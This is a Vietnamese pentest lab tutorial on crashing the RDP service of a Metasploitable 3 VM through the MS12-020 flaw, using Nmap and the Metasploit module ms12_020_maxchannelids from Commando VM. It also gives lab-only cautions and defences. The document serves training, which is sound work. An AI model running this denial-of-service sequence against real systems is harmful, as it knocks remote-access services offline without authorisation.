Pentest Lab : Commando & Metasploitable 3 - Tấn Công DOS MS 12-020
Pentest Lab: Tấn Công DOS Lỗ Hổng MS12-020 trên Metasploitable 3 với Commando VM
1. Tổng Quan
- MS12-020: Một lỗ hổng trong dịch vụ Remote Desktop Protocol (RDP) của Microsoft. Lỗ hổng này cho phép thực thi mã từ xa hoặc tấn công DoS trên các hệ điều hành Windows không được vá lỗi.
- Metasploitable 3: Máy ảo chứa nhiều lỗ hổng bảo mật để thực hành pentesting.
- Commando VM: Một môi trường Windows tùy chỉnh dành cho pentesters với nhiều công cụ hỗ trợ.
2. Mục Tiêu Bài Lab
- Thiết lập môi trường pentest với Commando VM và Metasploitable 3.
- Tấn công DoS lỗ hổng MS12-020 để làm dịch vụ RDP sập.
3. Thiết Lập Môi Trường
Bước 1: Cài Đặt Metasploitable 3
-
Tải Metasploitable 3:
- Tải từ GitHub: https://github.com/rapid7/metasploitable3.
-
Cài đặt Metasploitable 3:
- Làm theo hướng dẫn trong kho lưu trữ GitHub để xây dựng và chạy máy ảo.
-
Cấu hình IP:
- Đặt Metasploitable 3 trên cùng một mạng với Commando VM.
Bước 2: Cài Đặt Commando VM
-
Cài đặt Commando VM:
- Tải từ https://github.com/mandiant/commando-vm.
- Cài đặt trên Windows VM.
-
Cập nhật công cụ:
- Mở PowerShell và chạy:
choco upgrade all
- Mở PowerShell và chạy:
4. Thực Hiện Tấn Công DOS
Bước 1: Xác Minh Lỗ Hổng
-
Quét mạng để tìm Metasploitable 3:
- Dùng Nmap trên Commando VM:
nmap -sV -p 3389
- Xác nhận cổng 3389 (RDP) đang mở.
- Dùng Nmap trên Commando VM:
-
Kiểm tra lỗ hổng MS12-020:
- Dùng script của Nmap:
nmap -p 3389 --script rdp-vuln-ms12-020
- Dùng script của Nmap:
Bước 2: Tấn Công với Metasploit
-
Khởi động Metasploit trên Commando VM:
msfconsole
-
Tìm module MS12-020:
search ms12-020
-
Chọn module rdp/ms12_020_maxchannelids:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
-
Cấu hình mục tiêu:
set RHOST
set RPORT 3389 -
Thực hiện tấn công:
run
Bước 3: Kiểm Tra Kết Quả
- Dịch vụ RDP trên Metasploitable 3 sẽ bị crash, không thể kết nối qua cổng 3389.
- Kiểm tra log trên Metasploitable 3 để xác nhận dịch vụ RDP đã sập.
5. Lưu Ý và Phòng Chống
Lưu Ý Khi Thực Hiện
- Không thực hiện trên hệ thống thật: Chỉ thực hành trên môi trường lab.
- Phục hồi Metasploitable 3: Khởi động lại máy ảo nếu cần.
Cách Phòng Chống
-
Cập nhật bản vá:
- Áp dụng bản vá MS12-020 trên hệ thống Windows.
-
Bảo vệ RDP:
- Sử dụng VPN hoặc IP Whitelisting để giới hạn truy cập RDP.
-
Giám sát lưu lượng mạng:
- Dùng IDS/IPS để phát hiện và ngăn chặn tấn công.
6. Kết Luận
Bài lab này giúp bạn hiểu cách khai thác lỗ hổng MS12-020 để thực hiện tấn công DoS trong môi trường lab. Đồng thời, bạn sẽ học được cách sử dụng Nmap và Metasploit để xác minh và khai thác lỗ hổng. Đây là một kỹ năng cơ bản quan trọng trong quá trình học pentesting.